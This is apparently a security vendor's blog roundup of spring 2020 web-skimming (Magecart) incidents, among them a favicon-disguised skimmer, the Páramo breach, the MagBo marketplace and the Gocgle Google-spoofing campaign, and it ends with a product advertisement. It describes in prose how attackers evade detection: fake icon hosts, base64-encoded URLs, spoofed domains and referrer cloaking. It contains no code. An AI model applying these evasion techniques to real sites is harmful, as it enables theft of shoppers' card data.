The Malicious Gocgle Campaign Targeting Customers’ Payment Details

The COVID-19 virus epidemic has seen a 23% rise in visitors to UK independent ecommerce sites. On a global scale, many companies have transitioned to fully ecommerce-based business practices and are seeing an increase in online shoppers. This paradigm shift in business continuity means websites are increasingly vulnerable to being attacked. 

Our sources state that there has been a 20% increase in web-skimming attacks since the outbreak of the COVID-19 virus, and this month we have witnessed some high-profile Magecart attacks. 

Latest Client-Side Security News:

  • Favicon Skimmer
  • 1,236 infected websites
  • Páramo
  • MagBo
  • Gocgle Campaign

Favicon Skimmer

On May 6th, Bleeping Computer reported that hackers created a fake icon portal to host and load a JavaScript web-skimmer camouflaged as a favicon. The JavaScript is then loaded onto compromised ecommerce portals to steal customers’ credit card information. 

Malwarebytes published a report explaining how several compromised Magento websites loaded a web-skimmer instead of the website favicon on their checkout pages, replacing the sites’ legitimate checkout option.

(Crompromised website – Image Credit: Malwarebytes via Bleeping Computer)

Similar to other web-skimming attacks, the hackers went to great detail to evade detection including setting up a fake icon hosting website which loaded at myicons[.]net. This then loaded all its content from the legitimate iconarchive.com portal using an iframe. 

Malwarebytes discovered that attackers would load a benign image from myicons[.]net/d/favicon.png on all website pages except for checkout pages. Once customers attempted to check out the favicon PNG was automatically replaced with malicious JavaScript code designed to steal credit card information.

This attack was reported at the beginning of May when it was only a week old, and therefore only a handful of websites were affected at this time.

1,236 infected websites

Security Researcher Max Kersten discovered 1,236 infected websites. Bleeping Computer reported the discovery explaining how Kersten started with one domain that hosted a skimmer, and scanning service website, URLscan.io. 

Kersten spent 5 evenings manually checking each website for location and industry. He reported that most of the shops were affected in the US, followed by unknown locations, India and UK. As seen in the graph below, the majority of hacked websites were product-based sites, followed by unknown industry, food, services, and adult entertainment.  

(Impacted branches – Image Credit: Max Kersten)

Unsurprisingly, Kersten received no replies to the 200 notifications he sent to website owners. In his report, Kersten provides the full list of domains where a credit card skimmer was detected. 

Páramo

This month we witnessed a high-profile attack on British outdoor clothing retailer Páramo. On May 19th, The Register reported the attack on the ecommerce company which lasted for almost 8 months from July 2019 and March 2020. In that time frame, 3,743 customers had their payment details stolen. 

In a notice, the company told customers that they had discovered a “…small piece of computer code covertly installed within our website”. Continuing to explain; “This code copied card details entered, destined for PayPal and additionally sent them on to the attacker’s server. The data transferred was name, address, card number and CVV code.”

Although the company had security scans set up, they failed to detect the malicious code. Páramo’s IT Director, Jason Martin explains how the hack took place, stating; “the hackers’ method used a PHP file which modified out IFRAME src so that it still loaded the PayPal code, but also loaded an external JavaScript file”. The malicious JavaScript code was named gcore.js and was hosted on a third-party URL. 

The company have now removed the hack, patched the vulnerability, and are investigating Attack Detection tools to proactively monitor for other client-side attacks in the future.

MagBo

This month it was reported by ZDNet that more than 43,000 hacked servers were available for sale on the cybercrime store, MagBo. The portal has hacked servers for sale with some belonging to local and state governments, hospitals, and financial organisations.

(Magbo Ad on a hacking forum – Image Credit: ZDNet)

MagBo is the online marketplace for buying and selling of hacked servers. Launched in 2018, the portal has grown more than 14 times from 3,000 sites listed in September 2018 to 43,000 in May 2020. MagBo have sold access to more than 150,000 sites in total and it is believed that they have made more than $750,000 in revenue.

Gocgle Campaign

Domain-spoofing is a popular technique for attackers to avoid detection and has been seen in some of the high-profile Magecart attacks, including the British Airways hack when a malicious skimmer exfiltrated card details to a spoof domain, ‘baways[.]com’. 

Another popular spoof with hackers are third-parties, such as Hotjar, jQuery, and especially Google products. In the past, the legitimate domain ‘google-analytics.com’ has been impersonated by ‘google-anaiytic.com’ and ‘g-analytics.com’. Often Google products such as Google Analytics or Google Tag Manager are impersonated due to how frequently the legitimate products are used. These domain-spoofing attacks can be observed as early as 2016.

Security Boulevard reports cybersecurity company Reflectiz’s recent discoveries. According to the firm, hundreds of websites are already infected with the malicious Gocgle campaign which was first seen in late 2019 and is still currently active. 

The Gocgle campaign is linked to other malicious campaigns observed in the last few years and are all hosted in Russia.

(Linked campaigns – Image credit: Security Boulevard)

The hackers use three techniques to avoid detection; Google domain-spoofing, base64 encoding, and switching referrers. 

Once the attackers discovered a vulnerability, they injected the malicious code onto the website to harvest sensitive data. Obfuscating the malicious URL by using base64 encoding, attackers can insert a single line of code to the website code to minimise detection by manual code overview and static code analysis. 

The referrer is used to tell the web-page where the user has come from, hackers use this tool to avoid detection from security teams who use user journeys to scan websites for new malicious code. If the referrer doesn’t look to come from a legitimate consumer (with a web history), the malicious code will not be loaded and the server will return the regular google-analytics scripts.

Avoiding detection is a key goal in attacks so hackers can continue to steal payment information for as long as possible. One way they do this is by not interfering with regular processes on ecommerce sites. As Google Analytics is commonly used on sites, attackers ensure not to omit the actual role of Google Analytics or the checkout process, to avoid raising suspicion. 

RapidSpike security researchers have taken the time to investigate Magecart attacks mentioned. We can confidently say our Attack Detection would have detected these types of attacks. Attack detection takes less than 5 minutes to set-up and will alert you to any untrusted data on your ecommerce site.

Worried about being attacked? Detect web-skimming, formjacking and supply chain attacks. Easily protect against unauthorised changes to your critical JavaScript files with RapidSpike Client-Side Security: Attack Detection